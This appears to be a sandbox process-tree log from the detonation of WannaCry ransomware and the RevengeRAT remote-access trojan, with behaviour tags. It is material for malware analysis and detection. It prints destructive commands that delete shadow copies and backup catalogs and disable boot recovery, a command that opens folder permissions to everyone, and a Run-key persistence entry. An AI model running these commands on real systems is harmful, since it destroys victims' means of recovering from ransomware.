C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5272 /prefetch:12⤵PID:4048
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7692 /prefetch:12⤵PID:1768
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2144 /prefetch:12⤵PID:3496
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1948 /prefetch:12⤵PID:3172
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7912 /prefetch:12⤵PID:1968
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7268 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5272
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4692 /prefetch:12⤵PID:4800
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:460
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6408 /prefetch:12⤵PID:5768
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7524 /prefetch:12⤵PID:5208
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4692 /prefetch:12⤵PID:5104
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5544 /prefetch:12⤵PID:2180
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8260 /prefetch:12⤵PID:3172
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8300 /prefetch:12⤵PID:2364
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7680 /prefetch:12⤵PID:5720
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6216 /prefetch:12⤵PID:2464
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7384 /prefetch:12⤵PID:2276
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8260 /prefetch:12⤵PID:5528
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8644 /prefetch:12⤵PID:3436
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8260 /prefetch:12⤵PID:3012
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8736 /prefetch:12⤵PID:2736
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5516 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3596
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9204 /prefetch:12⤵PID:1796
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4148
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2848
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x498 0x3041⤵
- Suspicious use of AdjustPrivilegeToken
PID:5668
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5580
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\WannaCry.EXE"C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\WannaCry.EXE"1⤵
- Drops startup file
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
PID:1520 -
C:\Windows\SysWOW64\attrib.exeattrib +h .2⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:5548
-
-
C:\Windows\SysWOW64\icacls.exeicacls . /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:3824
-
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:4772
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 114191728143362.bat2⤵
- System Location Discovery: System Language Discovery
PID:3696 -
C:\Windows\SysWOW64\cscript.execscript.exe //nologo m.vbs3⤵
- System Location Discovery: System Language Discovery
PID:4620
-
-
-
C:\Windows\SysWOW64\attrib.exeattrib +h +s F:\$RECYCLE2⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:5772
-
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\@[email protected]PID:5340
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\TaskData\Tor\taskhsvc.exeTaskData\Tor\taskhsvc.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4084
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /b @[email protected] vs2⤵
- System Location Discovery: System Language Discovery
PID:5772 -
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\@[email protected]3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3828 -
C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet4⤵PID:2728
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5616
-
-
-
-
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4732
-
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\taskse.exetaskse.exe C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\@[email protected]2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4512
-
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\@[email protected]2⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1244
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "oefimrcpcbg941" /t REG_SZ /d "\"C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\tasksche.exe\"" /f2⤵
- System Location Discovery: System Language Discovery
PID:5848 -
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "oefimrcpcbg941" /t REG_SZ /d "\"C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\tasksche.exe\"" /f3⤵
- Adds Run key to start application
- Modifies registry key
PID:5164
-
-
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:3280
-
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\taskse.exetaskse.exe C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\@[email protected]2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5328
-
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\@[email protected]PID:3244
-
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\taskse.exetaskse.exe C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\@[email protected]2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:6128
-
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\@[email protected]2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3736
-
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:212
-
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\taskse.exetaskse.exe C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\@[email protected]2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:992
-
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\@[email protected]2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2708
-
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4020
-
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\taskse.exetaskse.exe C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\@[email protected]2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5912
-
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\@[email protected]2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:772
-
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4512
-
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\taskse.exetaskse.exe C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\@[email protected]2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5936
-
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\@[email protected]2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2768
-
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1892
-
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\taskse.exetaskse.exe C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\@[email protected]2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5204
-
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\@[email protected]2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3908
-
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3576
-
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\taskse.exetaskse.exe C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\@[email protected]2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5300
-
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\@[email protected]2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5932
-
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:5292
-
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\taskse.exePID:6244
-
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\@[email protected]PID:7248
-
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\taskdl.exetaskdl.exe2⤵PID:7992
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\114191728143362.bat" "1⤵PID:6128
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\114191728143362.bat" "1⤵PID:3580
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\114191728143362.bat" "1⤵PID:3840
-
C:\Windows\System32\NOTEPAD.EXE"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\114191728143362.bat1⤵PID:4880
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3512
-
C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\RevengeRAT.exe"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\RevengeRAT.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:5524 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"2⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5964 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"3⤵
- System Location Discovery: System Language Discovery
PID:5544
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\dwn_s9c7.cmdline"3⤵PID:6900
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7579.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc6721FD667E9419683F1B72DB5B65D.TMP"4⤵PID:4032
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ziet5enf.cmdline"3⤵PID:7356
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES777C.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF3792E12D71B4AAB869775C026276BDF.TMP"4⤵PID:7548
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\s-dem-n3.cmdline"3⤵PID:3292
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7847.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc57F27A776382403197F448C10EFCE8E.TMP"4⤵PID:7812
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\s_uvtyxp.cmdline"3⤵PID:6044
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES78E4.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcFDC1EC8FA45A4ABBB572895E4C3F66B4.TMP"4⤵PID:6420
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\q614avzi.cmdline"3⤵PID:6528
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7970.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc42311B16FC5B49318CD1B7A0B66D315F.TMP"4⤵PID:1272
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\w2sk2dj5.cmdline"3⤵PID:6696
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES79DE.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc86B6A653E7164AA89477412459388C77.TMP"4⤵PID:6804
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\lprpt8jw.cmdline"3⤵PID:6236
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7A99.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc25D1644363454DE1B58BEF917A5DF3B7.TMP"4⤵PID:6148
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\9-cek1oy.cmdline"3⤵PID:6912
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7CFA.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc978F61B4CAB45269105B98E8EB5855.TMP"4⤵PID:6176
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\rkm3pt6a.cmdline"3⤵PID:7284
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7EC0.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc220B7D1EBD4E4C039BFC598B2C1691E7.TMP"4⤵PID:7736
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\wfvh9_gf.cmdline"3⤵PID:7940
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7F2D.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc40286C9637D4CF792EB5627F5FC6352.TMP"4⤵PID:3992
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\zyyd3-dk.cmdline"3⤵PID:5204
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES846D.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc9D32972F85F94789969FB8C52A454B8.TMP"4⤵PID:2200
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\wgw2jvai.cmdline"3⤵PID:7760
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8509.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc14953FE767DB4D489CA5EE623D89C38F.TMP"4⤵PID:6648
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\yofmqtko.cmdline"3⤵PID:6324
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8586.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc81C06CDDB8C40FBABF1EE8D16F7DDDA.TMP"4⤵PID:6468
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\3dmj56cx.cmdline"3⤵PID:1272
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES85F3.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF4FB1DFECDA54404AB18125BCDFF2E1.TMP"4⤵PID:2464
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\wzxxw9eu.cmdline"3⤵PID:5836
-
